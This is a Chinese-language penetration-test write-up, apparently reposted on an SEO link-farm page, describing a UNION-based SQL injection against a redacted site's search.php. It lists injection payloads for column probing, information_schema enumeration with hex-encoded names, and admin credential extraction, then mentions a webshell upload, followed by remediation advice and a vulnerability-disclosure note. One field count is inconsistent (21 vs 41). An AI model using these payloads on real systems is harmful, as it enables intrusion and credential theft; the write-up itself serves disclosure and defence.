当前位置: 首页 > wzjs >正文

硬件开发网站最近的新闻摘抄

硬件开发网站,最近的新闻摘抄,蓬莱建网站,公司网站公司0x01 漏洞发现 在对某网站进行安全测试时,发现以下URL存在异常: https://******.com/search.php?keyword1&zt1954&dw1885&zz& 当参数keyword和zt被赋值为-1时页面返回特殊内容,初步判断存在SQL注入漏洞。 0x02 注入验证…

0x01 漏洞发现

在对某网站进行安全测试时,发现以下URL存在异常:

https://******.com/search.php?keyword=1&zt=1954&dw=1885&zz=&

当参数keywordzt被赋值为-1时页面返回特殊内容,初步判断存在SQL注入漏洞

0x02 注入验证与字段探测

1. 字段数量判断

通过order by语句测试字段数:

https://******.com/search1.php?keyword=-1&zt=-1 order by 21--+  # 正常返回
https://******.com/search1.php?keyword=-1&zt=-1 order by 22--+  # 报错

确认当前查询字段数为41个。

2. 联合查询定位回显点

https://******.com/search1.php?keyword=-1&zt=-1 union select 1,2,3,...,21--+

页面显示数字3,确定第三个字段为回显位

0x03 信息收集

1. 基础信息获取

# 获取数据库用户
union select 1,2,user(),4,...,21--+  --> root@localhost# 获取当前数据库
union select 1,2,database(),4,...,21--+  --> j**j# 获取数据库版本
union select 1,2,version(),4,...,21--+  --> 8.0.34

2. 表名爆破(十六进制绕过)

union select 1,2,group_concat(table_name),4,...,21
from information_schema.tables 
where table_schema=0x6****b6a--+  # j**j的十六进制编码

返回关键表名:****_admin

0x04 敏感数据提取

1. 列名获取

union select 1,2,group_concat(column_name),4,...,21 
from information_schema.columns 
where table_name=0x776b63****46d696e--+  # ****_admin的十六进制

2. 管理员凭证提取

union select 1,2,group_concat(*****_name,0x3a,*****_pwd),4,...,21 
from ****_admin--+

返回加密凭证:usernmae:password

0x05 后台登录与后续渗透

  1. 通过解密获得明文密码 *****

  2. 成功登录后台:https://*****.com/admin/login.php

  3. 通过某处上传功能上传一句话木马获取服务器权限

0x06 漏洞修复建议

  1. 输入过滤:对参数进行类型强制转换(如intval())

  2. 预编译语句:使用PDO或mysqli预处理

  3. 权限控制:避免使用root账号连接数据库

  4. WAF部署:拦截恶意SQL语句

  5. 加密存储:密码使用salt+哈希算法存储

0x07 漏洞提交与评分

本次发现的SQL注入漏洞已提交至CNVD(国家信息安全漏洞共享平台),经过审核,漏洞评分为 7.8(高危)
评分依据:

  • 漏洞类型:SQL注入

  • 影响范围:数据库敏感信息泄露

  • 危害程度:可获取管理员权限,进一步控制服务器

  • 修复难度:中等


郑重声明:本次渗透测试已获得合法授权,所有敏感信息均已脱敏处理。请勿将本文技术用于非法用途!


(注:文中所提到的漏洞已修复)


http://www.dtcms.com/wzjs/403717.html

相关文章:

  • 有口碑的中山网站建设做一个app软件大概要多少钱
  • 电子购物网站建设视频网站建设找哪家公司好
  • 网站后台登入不了出现验证码错误开车搜索关键词
  • 黄岛区做网站多少钱首页关键词怎么排名靠前
  • 网站访问量aspseo优化多久能上排名
  • 为什么有的网站打不开 别的网站就可以打开百度怎么做关键词优化
  • 个人网站的建立怎么做营销广告文案
  • 元芳重庆网站建设今日网站收录查询
  • 企业网站建设重要性seo优化外包
  • 网站开发开源框架app开发公司推荐
  • 四川省人民政府2022年森林防火令郑州怎么优化网站排名靠前
  • 网站建设经验材料seo平台代理
  • 兰州做网站维护的公司优化网络软件
  • 甘肃兰州是几线城市宁波百度快照优化排名
  • 做公务员题的网站上海百度公司地址在哪里
  • 租房网站开发商丘网站推广公司
  • 高端网站建设高端网站建设专家兰州百度推广的公司
  • wordpress设计的网站seo广告
  • 如何做婚庆公司的网站完整的社群营销方案
  • 电商网站建设推荐新东方烹饪学校
  • 传媒网站建设公司网站模板商城
  • 网站的备案号电脑网页制作
  • 老闵行是指哪里天津seo诊断技术
  • 做微信公众号页面的网站网站seo关键词排名优化
  • 河北省疫情防控最新政策seo核心技术排名
  • https网站开发企业策划
  • 做债的网站网站收录查询工具
  • 自己电脑做网站用备案百度游戏官网
  • 网站建设需要学什么想做百度推广找谁
  • 那些做黑网站的都是团体还是个人接广告的平台推荐